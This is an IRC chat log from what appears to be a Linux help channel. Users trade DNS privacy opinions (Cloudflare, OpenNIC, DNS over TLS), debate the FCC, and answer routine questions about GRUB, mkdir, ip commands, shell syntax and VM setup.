NSA checks your DNS requests extra carefully? 18:28 < anickname> ok for anyone who uses puppy linux, how would I mount a virtual disk (virtual machine) on boot? 18:28 < be2pal> No. Its opennic - https://en.wikipedia.org/wiki/OpenNIC 18:28 < Psi-Jack> Lope: Nope. 18:28 < ananke> anickname: /etc/fstab 18:28 < dgurney> well, sometimes extra cool factor comes with caveats :P 18:28 < ananke> opennic is interesting, but their servers fail too often for my taste 18:29 < ananke> every few months I'd have to go replace the ones that no longer function 18:29 < Psi-Jack> ^ 18:29 < Lope> Well it's interesting. I've been using 8.8.8.8 and 8.8.4.4 for a few years. I don't like all my DNS requests logged by google forever and ever amen. But I found the opendns IP's unreliable. 18:29 < junka> why wouldnt NSA check opennic 18:29 < junka> why isnt opennic NSA 18:29 < junka> why am i here 18:29 < be2pal> ananke: isnt opennic backed by non commercial entity 18:29 < ananke> junka: you're not making much sense 18:29 < ananke> be2pal: possibly. 18:30 < Frith> I tend to like obscurity through looking like a sheep. 18:30 < jackspyder> have you tried 1.1.1.1/ 18:30 < Frith> The camoflaged sheep tends to stick out a bit. 18:30 < Lope> Frith: you've just been added to a watch list. 18:30 * Lope pictures a sheep wearing full camo. 18:30 < Frith> Well, at least someone now cares. :) 18:31 < JimBuntu> Lope, that's easy... all you see is trees and grass and stff, no sheep... cause camo 18:31 < be2pal> 1.1.1.1 is by cloudfare. how it be secure by a commercial corporate 18:31 < Lope> Yeah cloudflare is not exactly EFF 18:32 < junka> still better then G ? 18:32 < Psi-Jack> Hmmm.. The only problem with 1.1.1.1 is DOH. 18:32 < Dominian> I haven't done DoH 18:32 < Dominian> I do DoT 18:32 < Psi-Jack> Sorry, but adding an extra 2 layers of protocol is stupid. 18:32 < Lope> What's DOH? 18:32 < Psi-Jack> DoT is actually in RFC stages. 18:32 < jackspyder> i forgot i was in the tinfoil hat, death to all companies that make a profit channel ^^ 18:32 < Dominian> Psi-Jack: yep 18:32 < Psi-Jack> DNS over HTTPS 18:32 < Dominian> Psi-Jack: I have my fireawll doing DoT 18:32 < Psi-Jack> Dominian: Nice. How's it been for you, and who're you using? 18:33 < Dominian> Psi-Jack: cloudflare 18:33 < Psi-Jack> Dominian: Eh? they do DoT too? 18:33 < Dominian> Psi-Jack: works ifne, they had an oddity ha dto patch when it came to unbound queries 18:33 < Dominian> Psi-Jack: yep 18:33 < Lope> jackspyder: well it's not the fact that it's a company that's a problem. It's a company in a particular jurisdiction that gets a fiber probe in it's anus. 18:33 < JimBuntu> jackspyder, here is your tin-foil dunce hat... go in the corner for your forgetfulness 18:33 < jackspyder> :D 18:33 < Psi-Jack> Dominian: But... They'r ethe pioneers of DoH.. And they don't even mention DoT.. 18:34 < Dominian> Psi-Jack: Well it doe swit :) 18:34 < Lope> department of transport? 18:34 < Psi-Jack> Lope: DNS over TLS :p 18:34 < Lope> haha. Alrighty. 18:34 < jackspyder> IIRC its not there quite yet? 18:34 < junka> whats teh diff with HTTPS 18:34 < junka> kek 18:34 < Dominian> 12:34:26.466873 IP 10.114.134.17.2753 > 1.1.1.1.853: Flags [F.], seq 564, ack 2784, win 519, length 0 18:34 < Dominian> 12:34:26.489333 IP 1.1.1.1.853 > 10.114.134.17.2753: Flags [F.], seq 2784, ack 565, win 30, length 0 18:34 < Dominian> ^^^ Psi-Jack 18:34 < Dominian> Just pulled that from my router 18:34 < Psi-Jack> junka: 1 extra uneccessary layer. 18:34 < Psi-Jack> Dominian: Hmmm 18:35 < ayecee> 1.1.1.1 eh 18:35 < Dominian> and 1.0.0.1 18:35 < Psi-Jack> Dominian: I will check it out. heh 18:35 < Dominian> Psi-Jack: hehe 18:35 < Lope> It's a fair point to say that whether you use 8.8.8.8 or 1.0.0.1 or whatever the fuck it is, they're just going to sniff it all anyway. 18:35 < ayecee> weird 18:35 < jackspyder> gotta admit they're great IPs 18:35 < Dominian> jackspyder: yah 18:35 < Lope> So you might as well see if there's a NSA provided DNS server we can all use. 18:35 < Lope> At least they have to pay for our data :) 18:35 < jackspyder> like literally the best IP you could get 18:35 < Dominian> who's going to snoop it? 18:35 < Psi-Jack> I hate Google DNS, refuse to use them after the issue where for a week I couldn' tget to google.com while using THEIR dns servers. heh 18:35 < junka> Lope; you are very rational :) 18:35 < john_rambo> Hi, I am using LXDE on my Raspberry Pi ...The clock is in 24hrs format ....I want 12hrs format how to change it ? 18:36 < jackspyder> turn it off at lunch time every day for 12 hours 18:36 < Dominian> Psi-Jack: It's really quick too 18:36 < Lope> all your data are belong to us. 18:37 < Dominian> If the root servers did DoT, I'd just query them directly 18:37 < jackspyder> I assume my data is always public, but i'm still going to make it as annoying as possible 18:38 < jackspyder> is there any downsite to hitting a root server directly? 18:38 < Dominian> Psi-Jack: btw this is on https://1.1.1.1 in regards to logging: We will never log your IP address (the way other companies identify you). And we’re not just saying that. We’ve retained KPMG to audit our systems annually to ensure that we're doing what we say. 18:38 < Dominian> jackspyder: not really 18:38 < Lope> Anyone seen the Purism kickstarter? Security and privacy focused phone https://puri.sm/shop/librem-5/ 18:38 < Dominian> jackspyder: sometimes can be faster, but yah 18:38 < Psi-Jack> Dominian: Yep. 18:38 < dgurney> Lope, i'm pretty sure most people here have seen that by now 18:39 < Psi-Jack> Dominian: I saw that, and heard that on the SecurityNow podcast I listen to. :) 18:39 < Dominian> Psi-Jack: yeah. That's another reason I started using them 18:39 < junka> Lope; thats old news 18:39 < angelo_ts> hi 18:40 < jackspyder> i switched to cloudflare, but they also just opened a new datacenter in my city 18:40 < jackspyder> googs are on fallback 18:41 < Lope> So who's pre-ordered one? 18:41 < jackspyder> actually hold the phone 18:41 < uplime> holding 18:41 < Frith> Odds on that phone ever shipping? 1 in 200. 18:41 < uplime> let me know when I can let it go 18:41 < jackspyder> How do i set a default dns server for all wifi networks 18:41 < jackspyder> on fedora 18:41 < prussian> your call is important to us 18:42 < Frith> Also, if it has a SIM card, you're now trackable. 18:42 < jackspyder> actually i'll just google it 18:43 < Lope> So have you removed 8.8.8.8 or did you just put 1.1.1.1 infront of it? 18:43 < jackspyder> Personally i ust put 1.1.1.1 in front, but i've just realised, on wifi you have to do that per network 18:44 < dgurney> well, imo that makes quite a lot of sense 18:44 < Lope> jackspyder: yeah I wonder where network-manager stores it's config file 18:48 < Psi-Jack> Heh. What pisses me off is that my isp does intercept dns queries and any nxdomain they inject their own reply. 18:48 < garylabronz> yeah that is annoying af, is it twc/spectrum? 18:49 < Lope> hehehehe 18:49 < SuperSeriousCat> Can you use DNSCrypt to bypass that? 18:49 < Lope> Yeah, bastards ;P 18:49 < Psi-Jack> Even if the dns comes from a 3rd party like Google dns. 18:49 < ayecee> oh wow, aggressive 18:49 < jackspyder> have you tried sending them a petrol bomb/ 18:49 < Psi-Jack> SuperSeriousCat: I bet DoT works 18:49 < jackspyder> I'd be mad at that 18:49 < ayecee> now you're on a list 18:50 < Psi-Jack> jackspyder: I've made complaints to corporate management. 18:50 < jackspyder> yeah but they've got you over a barrel so 18:50 < jackspyder> its that or no internet :/ 18:51 < SuperSeriousCat> Or DNSCrypt 18:51 < Psi-Jack> Not if we can get net neutrality to fracking pass. 18:52 < LissajousPattern> what we should be doing is trying to get rid of the FCC completely. 18:52 < collins> do you think linux for home users should be android-like when it comes to security? sandbox everything, restrict most things. 18:52 < Psi-Jack> No fcc is important. 18:52 < revel> I hate getting the FCC and EFF mixed up... 18:53 < dgurney> collins, a restricted distro like that certainly has its uses 18:53 < uplime> collins: no. if i wanted everything sandboxed I would get a chromebook 18:53 < garylabronz> agreed! 18:53 < Lope> well maybe at some point there will be a new decentralized internet that we can all use. 18:54 < jackspyder> FCC is fine, the issue is the world has gone fucking mad 18:54 < Lope> Like the dark web sortof. 18:54 < LissajousPattern> nah the FCC is pretty messed up 18:54 < Psi-Jack> LissajousPattern: you sound.. Uninformed 18:54 < Lope> The head of FCC says that RF only causes heating of bodily tissues and has no other effects. 18:54 < Frith> Lope: Then businesses will use it. Then money will be made. Then the government will restrict it. 18:55 < collins> uplime: if it were up to me I'd just have a console with a compiler. But I'm talking about the general public here. Businesses and home users. 18:55 < Frith> Lope: That is true. 18:55 < Lope> He is basically god and no scientific evidence to the contrary can disagree with him or even be considered. 18:55 < Lope> That's never a good thing. 18:55 < uplime> collins: ok. that doesn't change my answer 18:55 < Frith> Lope: There is no physical mechanism for RF to interfere at a cellular level other than heating. 18:55 < uplime> also, a console and a compiler doesn't do much 18:55 < ||JD||> Lope: isn't Pied Piper developing that already? 18:55 < Lope> Frith: I see you've drunk the coolaid. 18:55 < uplime> that means no editor, no core utils, no shell 18:55 < LissajousPattern> Psi-Jack, please inform me then. I am a radio operator and understand that I have had to learn some sobering lessons regarding thoversite of the airwaves as it were 18:56 < Frith> Lope: If you mean due to a physics degree, yes. 18:56 < collins> uplime: you're looking at it solely from your own perspective 18:56 < uplime> collins: not really 18:56 < Lope> Frith: so lots of coolaid. 18:56 < uplime> you asked for opinions, I gave mine 18:57 < Frith> Lope: Also, it was Flavoraid at Jonestown. 18:57 < Frith> And you spell "Kool-aid" with a K. 18:57 < Lope> I'm not american so I spell it with a C 18:57 < LissajousPattern> you see I believe in free speech regardless of the medium and that means I do not wish to have some government agency telling when and where or even how I choose to exercise that free speech. including using RF to broadcast if I have the aptitude to do so. 18:57 < Psi-Jack> LissajousPattern: what does the fcc do? What problems do that warrant that they may be terminated in your mind? 18:57 < jackspyder> a machine with just a compiler and a console would be max secure 18:57 < Frith> Lope: I don't know what "Coolaid" is in that case. 18:57 < jackspyder> because humans are the issue and you'd eliminate most idiots 18:57 < Psi-Jack> Oh nevermind 18:58 < Frith> jackspyder: As long as the compilere hasn't been compromised. 18:58 < Lope> Frith: it's a metaphor/ 18:58 < LissajousPattern> I have a FCC license 18:58 < Psi-Jack> LissajousPattern: so uninformed and biased 18:58 < Frith> Lope: Is that likle a simile? 18:58 < Lope> Frith: so much for your education. 18:59 < garylabronz> LissajousPattern: your argument isn't very convincing. What is it that the FCC is doing to limit your free speech? broadcasting RF != free speech 18:59 < LissajousPattern> Psi-Jack, so please inform and help me get away from my bias. I am always welcome to listen to and consider new information. 18:59 < Frith> Lope: Are you saying it was closer to an analogy? 18:59 < Lope> Frith: buddy, it's whatever you want it to be at this point. 18:59 < ananke> how in the world is 'coolaid' a metaphor? 19:00 < jackspyder> The issue with the FCC as an organisation is that it swings widly in 2 different political directions as and when partys shift 19:00 < Frith> ananke: https://xkcd.com/762/ 19:00 < jackspyder> and they end up just back and forth implementing and undoing eachothers policy 19:00 < jackspyder> kind of like the rest of politics forever 19:01 < garylabronz> ah sure, but it _should_ be non-partisan. I think abolishing the FCC is not the actual issue, you really want a non-partisan regulatory body that works for the people 19:01 < garylabronz> i agree current form FCC is pretty rubbish 19:01 < jackspyder> implementation issues as ever 19:02 < LissajousPattern> garylabronz, are you aware of all the litigations that have taken place in regards to the exercising of free speech by means of ham radio? 19:02 < Psi-Jack> LissajousPattern: cellular company gets reports that they have interface at a very specific tower location. Fcc is called because the disturbance is radio based. Turns out someone living near the tower was bit coin mining with a Chinese miner. 200 customers were affected. 19:02 < LissajousPattern> there are too many to count 19:03 < garylabronz> LissajousPattern: enlighten me please 19:04 < prussian> shame rf is a limited resource. 19:04 < LissajousPattern> garylabronz, you can actually go to the FCC website and look ongoing enforcement actions taking place against different people 19:05 < anickname> ok 19:05 < anickname> one thing 19:05 < LissajousPattern> its all public 19:05 < anickname> when I'm using puppylinux in a vm, it gives me a 10 second prompt saying choose an option to start it up 19:05 < anickname> is there a way to automatically skip this prompt 19:05 < anickname> and just automatically boot it 19:05 < garylabronz> im not sure im following your point tho? are you saying they should not be enforcing anything/what has it got to do with free speech? 19:05 < garylabronz> anickname: i think you want to edit your grub conf 19:06 < anickname> how would i go about doing that in a virtual machine 19:07 < garylabronz> edit the grub conf after its booted :) 19:07 < dgurney> the same way you would on a real computer 19:07 < Psi-Jack> LissajousPattern: so what if the fcc wasn't there. Do 200 customers may have to suffer because one individual is making so much RF noise hey themselves don't even know? 19:08 < LissajousPattern> Psi-Jack, I am actually not saying that. But it should be pretty obvious after a bit of digging that the spectrum is being mismanaged and offered up to the highest bidder 19:09 < LissajousPattern> which is always a very slippery slope when dealing with any natural resource. 19:09 < fendur> what the difference between giving it to the highest bidder and giving it to the one who can overpower the rest with their transmitter? 19:09 < garylabronz> LissajousPattern: so you disagree with the current form of the FCC? and waht may be "pretty obvious" to you may not be to others 19:09 < anickname> how do I edit my grub at all? 19:09 < anickname> is it a certain file 19:09 < LissajousPattern> garylabronz, true 19:10 < Psi-Jack> LissajousPattern: well without the fcc, whom specialized in RF. Who would handle it? Heh 19:10 < junka> yes /etc/default/grub 19:10 < LissajousPattern> Psi-Jack, thats a whole other ball of wax of course 19:10 < anickname> thank you 19:10 < Lope> how can I run this without the && getting interpreted by the local computer? I want the && to pass through into the container command. 19:10 < Lope> systemd-nspawn -a -D /foo/ apt-get update && apt-get upgrade 19:11 < Psi-Jack> Exactly. Which is why the fcc exists. 19:11 < junka> anickname; dont forget to grub2-mkconfig -o path-to-grub.cfg 19:11 < garylabronz> wrap it in single quotes, or do bash -c '' 19:11 < anickname> thank you :) 19:11 < Lope> garylabronz: ah yes, perfect, thanks. 19:12 < junka> should be somewhere in /boot anickname 19:12 < LissajousPattern> Psi-Jack, and to be honest I don't think anyone has the answer to that 19:12 < gronke> Is there a mv flag that will create the directory if it doesn't exist? 19:13 < LissajousPattern> but we should at least consider it because either extreme would probably not be to our benefit as a society 19:13 < junka> mkdir? 19:13 < gronke> junka, I'm wondering if I could do a mv /foo/bar/myfile.txt /foo/dog/myfile.txt with a flag that will create dog/ if it doesn't exist 19:14 < gronke> will mkdir -p try to create the directory and have no error if it already exists? 19:14 < prussian> gronke: use install -D 19:14 < jml2> gronke, ? 19:14 < Lope> mawk: this systemd container spawn shit is amazing!!! Thank you!! 19:15 < Trel> When using the ip command to set an IP address, is there a way to clear out all old ones? 19:15 < jml2> gronke, mv is a core posix util, it would be dumb for the coreutils to share too much functionality 19:16 < gronke> jml2, is there any way I can do a mkdir that creates two folders? like mkdir foo/bar doesn't appear to work 19:16 < prussian> mkdir -p 19:17 < gronke> prussian, -p appears to suppress the error if a folder already exists, like mkdir -p foo when foo already exists 19:17 < jml2> gronke, you already answered your own question before.. 19:17 < garylabronz> mkdir {foo,foo/bar} 19:17 < gronke> apparently it does both, interest 19:17 < gronke> *in 19:17 < gronke> *g 19:17 < uplime> garylabronz: mkdir -p foo/bar 19:17 < jml2> gronke, no not for the top dir I suppose. 19:17 < jml2> with -p it should 19:17 < lite4y> what does a DNS look up through dig mean? does it find the vip of the particular website? 19:17 < garylabronz> uplime: yeah, but if you want mkdir to error do it my way 19:18 < jml2> gronke, if there's a file that exists with the same name then it won't work 19:18 < uplime> well I still wouldn't do it that way 19:18 < uplime> i would do mkdir foo{,/bar} 19:18 < garylabronz> if you want error do it with mkdir {foo,foo/bar} if no error do -p 19:18 < uplime> thats a pretty useless expansion 19:19 < jml2> mkdir -p 1/2/3 works, as long as I don't have a file called "1" that is already existing 19:19 < uplime> jml2: it still works even if 1 exists 19:19 < jml2> uplime, I said a "file" 19:19 * jml2 -_- 19:20 < uplime> jml2: oh oops 19:22 < jml2> Trel, ip addr del ? 19:22 < jml2> Trel, (man ip-address) 19:23 < Trel> jml2: that's for one, since the command to set is add, I was under the impression there could be multiple added that way, I am looking for a way to clear them ALL out 19:23 < jml2> Trel, use flush 19:23 < doublehp> GeForce 8400M, which driver do you recommend for Xorg ? Nouveau seems .. suboptimal ... 19:24 < Trel> jml2: that's what I was looking for thanks. 19:24 < dgurney> doublehp, nouveau 19:25 < jml2> Trel, get used to nmcli if your distro uses it as well.. 19:25 < jml2> Trel, you wouldn't want to be fighting with ip commands vs the networkmanager daemon 19:26 < doublehp> dgurney: but, it's buggy, mplayer reads video with saccaded stream, and CAD softwares complain about ... i don't know what, acceleration missing 19:26 < CrazyTux> hello, has anybody here heard of PCLinuxOS? 19:26 < doublehp> dgurney: glxgears only give 60FPS 19:26 < jml2> CrazyTux, yeah, i used to use it 19:27 < jml2> CrazyTux, its based of mandriva things. 19:27 < CrazyTux> jml2, what's your opinion on it? 19:27 < CrazyTux> about the current version of it? 19:27 < jml2> CrazyTux, it's fine. the newew mandriva based ones are mageia and openmandriva 19:28 < hendrix> PCLinuxOS.. haven't heard that name in a long time 19:28 < jml2> I used it years ago for a very short period of time.. 19:28 < CrazyTux> hendrix, https://www.pclinuxos.com/ 19:28 < jml2> I like the idea they have a community magazine 19:28 < dgurney> doublehp, well you don't really have any better options with such ancient chip 19:29 < jml2> the pclinuxos team are doing the right thing in encouraging users in contributing to their own community magazine 19:29 < CrazyTux> jml2, all these three are suitable for beginners. Aren't they? 19:29 < jml2> that's the way distributions should work 19:29 < doublehp> dgurney: both SweetHome and FreeCAD crash at start :/ they don't even work slowly ... they crash !!! 19:29 < jml2> CrazyTux, mandriva was user-friendly in the late 90's... so the answer is yes 19:30 < doublehp> dgurney: I had better GLXgear results with the GForces I used in 2001 .... 19:30 < jml2> CrazyTux, it was technically actually called "mandrake" back then 19:30 < diogenese> until the lawsuit 19:30 < jml2> due to some trademark snuff they changed the name later 19:30 < CrazyTux> jml2, ok. Which one among the three would you recommend for a newbie, then? 19:31 < jml2> CrazyTux, I haven't used mandriva-things in a long while, but mageia has gotten very user friendly with a new welcome window which offers to install the nvidia driver.. this is good for new users.. 19:31 < dgurney> doublehp, that's unfortunate, but honestly you're just SOL unless you're willing to try getting older nvidia drivers work with modern linux (wholeheartedly unrecommended) 19:31 < doublehp> dgurney: thanks, bye 19:31 < CrazyTux> jml2, ok 19:32 < CrazyTux> jml2, is Mageia easier than Ubuntu, OpenSuse Leap? 19:32 < Megabyte> hello 19:32 < lite4y> what does the command dig +trace www.google.com do? 19:32 < jml2> CrazyTux, ? 19:32 < jml2> CrazyTux, if you've tried both you'll say they're both just as easy to use. 19:33 < uplime> it does a dns lookup on www.google.com and traces the path (iirc) to the responder 19:33 < jml2> CrazyTux, as well as install 19:33 < jml2> CrazyTux, suse or opensuse is very confusing for installation for new users imho. 19:33 < meyou> hmm 19:33 < jml2> CrazyTux, especially when they would come across the partitioning setup 19:34 < lite4y> uplime: is it same as that of a traceroute command in linux? 19:34 < CrazyTux> jml2, actually I have used all these three. But, I frequently encountered this issue of random freezing on Ubuntu LTS and even on Leap. 19:34 < uplime> lite4y: no 19:34 < revel> lite4y: No, it's for DNS. 19:34 < lite4y> oh ok 19:34 < revel> "trace delegation down from root" 19:34 < uplime> what does delegation mean in this context? 19:35 < jml2> CrazyTux, likely your hardware is crap, and you would have to figure out what kernel parameter tweaks you need to make things work properly. 19:35 < Megabyte> Have you guys heard of LazyNezumi? I was wondering if there's a mouse/tablet smoothing program for Linux as well. 19:35 < revel> From the DNS root servers to the ones for TLDs to the specific nameserver for that domain, I think. 19:35 < uplime> ah 19:35 < revel> Might be a bit longer, but that's what it seems to be for google.com 19:35 < CrazyTux> jml2, no. My laptop is a new one. Only some distros seem to have this problem. 19:36 < Frith> My home Linux project -- I have a mechanical clock that is stopped. 19:36 < Frith> Now, everyone knows that a broken clock is right twice a day. 19:36 < Frith> So, I'm going to build image recognition for the hands, and figure out what time the clock says. 19:36 < Frith> Then, I'll turn on a green led saying the clock is right nor not. 19:37 < Frith> Based on the current system time. 19:37 < prussian> sounds cool 19:38 < prussian> should be doable in opencv easy enough 19:38 < fendur> Frith: I could ship you a double-A battery if you wanted... 19:39 < fendur> or perhaps you'd just prefer all the components to _build_ a double-A battery. 19:39 < FreeFull> Is there a good way to set the GTK theme on a per-program basis? 19:40 < FreeFull> Some programs don't look very good with a dark theme 19:40 < jml2> FreeFull, create a script with variables before calling the binary, likely you can 19:40 < Frith> fendur: Where's the fun in that? 19:41 < fendur> Frith: parimony IS fun. 19:41 < fendur> +s 19:43 < CrazyTux> is Mageia as secure and stable as OpenSuse? 19:44 < section1> maybe more. 19:44 < iol> hi, could somebody please help me pass the result of one command as a param on another? 19:44 < Megabyte> CrazyTux, Only if you use a pentagram 19:44 < CrazyTux> Megabyte, what? 19:45 < Megabyte> CrazyTux, Mageia = Μαγεία = Magic 19:45 < iol> i'm trying specifically to cat the results of the filename associated with a variable 19:45 < jml2> CrazyTux, it uses redhat sources. 19:45 < iol> so it seems like echo $FOO | cat should work 19:45 < jml2> CrazyTux, just as the other mandriva-based distros 19:45 < uplime> iol: cat "$(some command here)" 19:45 < invisisith> could anyone point me to a comprehensive cheat sheet for linux admins 19:45 < iol> oh ok 19:46 < iol> thanks uplime 19:46 < uplime> echo foo | cat just takes foo on stdin and prints it on stdout 19:46 < uplime> anytime 19:46 < iol> yeah 19:46 < iol> usually i'm just greping logs that way, i didn't know the "$(foo)" syntax 19:46 < iol> i googled a bit too but i guess i wasn't phrasing it right 19:46 < iol> thanks again 19:47 < CrazyTux> jml2, the last time I used Mageia, it was quite stable. While other distros had this issue of random freezes, I never faced this on Mageia, even once. 19:47 < uplime> iol: for future rference, its called command substitution if I'm not mistaken 19:47 < CrazyTux> But, is the community as dynamic as others like Debian, Ubuntu etc? 19:47 < jml2> CrazyTux, shouldnt blame a distro for poor hardware 19:48 < jml2> lol 19:48 < RusAlex> grep is the best for logs 19:48 < uplime> sometimes awk 19:48 < RusAlex> columns as well 19:48 < iol> actually is there something like an api? i know there's man pages and all but i'm used to browsing through code documentation i guess so that's the format i'm used to 19:48 < uplime> iol: an api for what? 19:48 < iol> bash i guess? 19:48 < iol> shell scripting 19:49 < section1> its call documentation 19:49 < uplime> i generally just sit in #bash and thats where I learn these things. theres also wiki.bash-hackers.org, mywiki.wooledge.org, the help builtin command, the bash man page, wooledge's bash guide, and the gnu bash manual 19:49 < iol> yeah thanks section1 i found it on gnu :) 19:49 < garylabronz> get use to the man page, i still am - but its really paying off.so fast to find information and no need to break out into your browser/etc 19:49 < section1> :) 19:49 < uplime> im not aware of any reputable resources beyond those 19:50 < iol> uplime: thanks so much, all good advice 19:50 < uplime> anytime :) 19:51 < iol> garylabronz: yeah i see the merit in that for sure, i use the shell a lot but just for specific things that i asked somebody to do 1-5-10 years ago and memorized 19:51 < iol> but what i use it for i couldn't imagine doing any other way 19:51 < iol> so i'm sure man page is the same as that :) 19:51 < uplime> there is also shellcheck.net, which is something you should use a lot 19:51 < iol> thanks all 19:51 < garylabronz> shellcheck is great, i run it all the time with vim & syntastic 19:53 < koala_man> glad you're finding it useful ^^ 19:53 < uplime> i hear the dev is a terrible guy though 19:54 < koala_man> :( 19:54 < section1> hehe 19:54 < garylabronz> yeah man, really appreciate your work 19:54 < uplime> koala_man: <3 19:54 < koala_man> :* 19:55 < jml2> garylabronz, that's right gary tell those noobs :) lol 19:57 < twainwek> wait an actual program written in haskell? 19:58 < Trel> jml2: the machine in question was static, so I had disasbled network manager. 19:58 < koala_man> yes! 19:58 < kazdax> hi i am installing RHEL on virtual machine 19:58 < kazdax> does the cPU usually spike a 100 percent when tis installaing ? 19:59 < kazdax> the istallation is quite slow 19:59 < section1> kazdax, its a spike or its full 100% ? 19:59 < kazdax> its full 100 percent 20:00 < kazdax> all the time 20:00 < kazdax> i am using KVM With virt-manager 20:00 < jml2> Trel, you mean static ip? you can set that up with nmanager, have a system profile default 20:00 < section1> lot of time i don't install rhel 20:00 < section1> but not happen with debian. 20:00 < kazdax> i am using it to study for my RHCSA 20:00 < jml2> Trel, if you dont want desktop users handling control of the ip settings, then you should be able to disable their ability to use nm 20:00 < rafal_m> Hi everyone! I've just finished watching 3rd season of Mr.Robot and I liked it a lot. Does anyone have any reccomendations for movies that are similar to this series? I mean, something connected with the technical world (preferably) and with this mystery vibe to it. I liked "The Social Network" too, it's something that I'm looking for 20:01 < kazdax> rafal have you checked out crash and burn 20:01 < Trel> jml2: it's a server install, I don't want nmanager running 20:01 < ||JD||> rafal_m: halt and catch fire 20:01 < kazdax> should i give it more CPUs to work with 20:01 < kazdax> i am using a i5 20:01 < kazdax> more cores i mean 20:02 < section1> halt and catch fire its nice... 20:03 < section1> but very different of mr robot i think 20:03 < Trel> I just needed to set the IP temporarily (manually). 20:03 < Trel> It's all good now 20:03 < rafal_m> Thanks, will check it out 20:04 < Trel> I have the Network Manager wiki pages saved from the Arch wiki for my own use on laptops/desktops. 20:04 < anickname> ok I'm on puppy linux and I'm trying to install some packages using PPM 20:04 < RayTracer> kazdax: as the installation consists mainly of unpacking rpms, running scripts and eg. compressing initramfs, I'd consider it normal to have 100% of a single cpu 20:05 < xnekomata> lol quora is down 20:05 < anickname> but it's telling me there's no space left on the device 20:05 < anickname> however, there's about 8GB of free space left 20:05 < anickname> so I don't know why it's telling me that 20:05 < kazdax> raytracer but its to damm slow 20:05 < kazdax> okay i gave it 2 cpus to use 20:05 < kazdax> its doing better now 20:06 < sauvin> anickname, does the device have free inodes? 20:06 < RayTracer> df -i to check 20:06 < section1> and its not mounted as read only.. 20:06 < kazdax> i think the video course should have told us about giving atleast 2 cpus to work with ..because on a single CPU core ..it runs really slow 20:06 < kazdax> even an old ubuntu runs really slow on just a single core 20:07 < revel> kazdax: Maybe that's because basically everyone has a multicore setup now? 20:08 < revel> Just like how everyone's on x86_64 now too. 20:08 < anickname> sauvin what's a free inode? 20:08 < garylabronz> im on arm kiddos 20:09 < kazdax> right 20:09 < kazdax> so the author assumes someone like me would be intellegent enought to figure out how much cores to give 20:09 < oehansen> revolution of the lefties 20:09 < RayTracer> my arms have 4 cores, though 20:09 < sauvin> anickname, roughly speaking, allocation units. 20:09 < revel> garylabronz: I think you're also on a version of weechat that anyone can cause to crash at any moment. 20:10 < garylabronz> damn, what should i use instead? im a noob. i started with irssi, i want something lightweight 20:10 < revel> A newer version of Weechat? 20:11 < kazdax> irssi is decent 20:11 < anickname> I mean I should? 20:11 < kazdax> but i like using the GUI 20:11 < kazdax> if i had no GUI iw ould irssi 20:11 < garylabronz> i live in the terminal, i might get irssi rolling 20:11 < Trel> I'd put in my vote for Weechat over Irssi 20:11 < garylabronz> and yeah ok, i see im on old version 20:12 < revel> garylabronz: CVE-2017-8073, I think. 20:12 < anickname> sauvin: I'm looking at filesystems and it's telling me /dev/loop0 and /dev/loop1 are full (/initrd/pup_ro2 and /initrd/pup_z respectively) but I got another mounted fielsystem at /dev/sda1 that it doesn't seem to want to use 20:12 < garylabronz> i need to just manually install weechat.. thanks revel! 20:12 < revel> Yeah, no problem. 20:13 < kazdax> why is it that some programm..when run ... take hol dof the terminal and the GUI starts runnign yet the terminal you cannot work on and others would execute the GUI app and allow you to use the terminal 20:15 < JimBuntu> kazdax, try using '&' after typing the name of a program that is blocking 20:18 < qman> kazdax: because the program is running and attached to stdout 20:30 < mawk> have fun Lope lol 20:34 < kazdax> i am looking for a refurbish laptop to run linux as the main operating system 20:34 < kazdax> what should i get ? 20:36 < FreeFull> kazdax: Depends on what software you want to run 20:36 < FreeFull> At least 4GB of RAM would be recommended, if you want to browse the web 20:37 < FreeFull> Linux itself will run on pretty much anything 20:37 < dgurney> at least 4gb of ram, and nothing too ancient 20:38 < dgurney> an older thinkpad (like an x220 or t420) would be a good bet 20:48 < Brainspackle> weechat > irssi, despite its unfortunate name 20:51 < mawk> of course 20:53 < ntd> how do you deal with a institutional monopoly service provider which isn't used to be called on bs and are exceedingly sparse with cause/fix info in fear of being outed as inept? 20:54 < ntd> i mean, letting it run it's course is one option, but takes forever :P 20:54 < Psi-Jack> 2GB ram would. Work. For light browsing only. 20:55 < qman> ntd: you start your own competing service 20:57 < ntd> which is functionally what i'm doing, hence them being apprehensive. problem is my business and them are close to conjoined twins 20:59 < twainwek> you need at least 64GB ram if you're running gnome3 and eclipse 21:00 < ShalokShalom> ^^ 21:01 < revel> twainwek: How do you have a googleusercontent domain? :o 21:01 < ShalokShalom> kazdax: in which country do you reside? 21:01 < kazdax> America 21:01 < Psi-Jack> Gnome3 is actually, itself, relatively light on RAM, 1GB for it's core environment. 21:02 < kazdax> i used to love using gnome as a kid 21:02 < kazdax> just seeing that hobbit feet :D 21:02 < revel> Is 1GB "relatively light" now? 21:02 < ShalokShalom> ^^ 21:02 < Psi-Jack> revel: Yes. 21:02 < Frith> revel: I was thinking the same thing. 21:02 < dgurney> with modern hardware, 1GB is not a problem 21:02 < Frith> "Back in MY day...." 21:02 < revel> After Firefox, sure, but just on a blank desktop? 21:02 < twainwek> revel: i'm majority share holder at google. just kidding, i'm on their vps 21:02 < Psi-Jack> revel: Yes 21:02 < ShalokShalom> kazdax: I prefer refurbished shops such as rebuy 21:03 < kazdax> okat my RHEL installation was really slow on KVM 21:03 < revel> Seriously? 21:03 < ntd> gnome3 would've been leaner without all the forced evolution, calendar, bells&whistles 21:03 < Psi-Jack> revel: Yes 21:03 < ShalokShalom> Elitebook is what I recommend 21:03 < kazdax> using virt-manager anyone know what the rpoblem could be ? 21:03 < dgurney> I just hope that big memory leak problem gets fixed soon 21:03 < revel> twainwek: Alright, thought so. 21:03 < kazdax> i will look at rebuy 21:03 < ShalokShalom> 4GB RAM and SSD 21:03 < kazdax> i want 16 gig ram 21:03 < ShalokShalom> KaOS as OS 21:03 < ShalokShalom> sure 21:03 < ShalokShalom> i told the minimum 21:03 < Psi-Jack> I want 64GB RAM, but I have 16GB now. 21:03 < ntd> ShalokShalom, you won 21:04 < ShalokShalom> ntd: huh? 21:04 < ntd> ShalokShalom, you won't notice any diff while just uing gnome 21:04 < ShalokShalom> what? :D 21:04 < ShalokShalom> ntd: i dont use GNOME 21:04 < ShalokShalom> KaOS is a KDE only distro 21:04 < dgurney> I've never needed more than 16GB even with a few VMs open 21:04 < ntd> sorry, got ShalokShalom and kazdax msg mixed together 21:05 < Psi-Jack> revel: Off-the-shelf pre-built computers, these days, are commonly being sold with 8GB RAM at the average baseline. There's /some/ with 4GB, but very few. There's others that start with 12GB and 